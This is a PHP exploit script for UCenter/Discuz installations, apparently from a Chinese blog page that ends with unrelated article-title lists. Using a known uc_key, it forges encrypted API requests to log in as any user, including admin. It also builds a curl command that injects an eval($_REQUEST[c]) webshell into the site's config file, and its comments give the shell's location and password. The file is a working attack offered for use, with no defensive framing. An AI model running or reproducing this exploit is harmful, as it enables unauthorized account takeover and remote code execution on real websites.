<?php

$key = 'cebbvi5s15BSiMXteaP9TNCIz5K5jAVekw7tcV9TqmYCNT5VOJdu7toOxipTX';#uc_key 写在这里

$url = 'http://localhost/api/uc.php';

#$arg = 'action=updateapps&time='.time();#拿webshell:http://localhost/config/config_ucenter.php 密码:c

$arg = 'action=synlogin&uid=1&username=admin&time='.time();#登录任意用户

#其他的 可以看api里的接口,格式:action=接口&参数

echo 'curl "'.$url.'?code='.rawurlencode(authcode($arg,'ENCODE',$key)).'" -d "'.addslashes('<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">https://sb\');eval(\$_REQUEST[c]);#</item></root>').'"';

#登录任意用户直接访问url即可,getshell可以curl或者用其他工具post提交

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

  $ckey_length = 4;

  $key = md5($key);

  $keya = md5(substr($key, 0, 16));

  $keyb = md5(substr($key, 16, 16));

  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

  $cryptkey = $keya.md5($keya.$keyc);

  $key_length = strlen($cryptkey);

  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;

  $string_length = strlen($string);

  $result = '';

  $box = range(0, 255);

  $rndkey = array();

  for($i = 0; $i <= 255; $i++) {

    $rndkey[$i] = ord($cryptkey[$i % $key_length]);

  }

  for($j = $i = 0; $i < 256; $i++) {

    $j = ($j + $box[$i] + $rndkey[$i]) % 256;

    $tmp = $box[$i];

    $box[$i] = $box[$j];

    $box[$j] = $tmp;

  }

  for($a = $j = $i = 0; $i < $string_length; $i++) {

    $a = ($a + 1) % 256;

    $j = ($j + $box[$a]) % 256;

    $tmp = $box[$a];

    $box[$a] = $box[$j];

    $box[$j] = $tmp;

    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

  }

  if($operation == 'DECODE') {

    if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {

      return substr($result, 26);

    } else {

      return '';

    }

  } else {

    return $keyc.str_replace('=', '', base64_encode($result));

  }

}

?>

最新文章

  1. iMac 升级到10.12后,蓝牙不能用
  2. 字符串专题:KMP POJ 3561
  3. vim 设置行号
  4. 个人觉得目前 最好用的Taobao API的NodeJS封装
  5. 深入理解 CSS3 弹性盒布局模型
  6. nyoj 139 我排第几个--康拓展开
  7. vs2005中删除最近打开的项目和文件的记录
  8. Ubuntu 的基本操作
  9. UML的概念模型
  10. Spring SimpleJdbcTemplate Querying examples
  11. 字符串还可以这样初始化--uboot篇
  12. mybatis处理单表多表操作以及动态sql和批量操作
  13. Spring配置静态目录
  14. 如何给网页标题栏上添加图标(favicon.ico)
  15. Ubuntu中nfs服务器安装与配置
  16. juce中的timer
  17. NetCore WebSocket 即时通讯示例
  18. GitChat招募IT类写作作者
  19. 爬虫基础——HTTP基本原理
  20. HDU.3516.Tree Construction(DP 四边形不等式)

热门文章

  1. Android 中4种屏幕尺寸
  2. 在Xcode5和Android Studio添加工程间的依赖
  3. mybatils多次查询问题
  4. 食物链(codevs 1074)
  5. LinuxC语言读取文件,分割字符串,存入链表,放入另一个文件
  6. 深入学习SQL的Limit语句
  7. 在Linux中创建静态库.a和动态库.so
  8. ava中Class.forName的作用浅谈
  9. BZOJ 1192: [HNOI2006]鬼谷子的钱袋 数学结论
  10. Hark的数据结构与算法练习之归并排序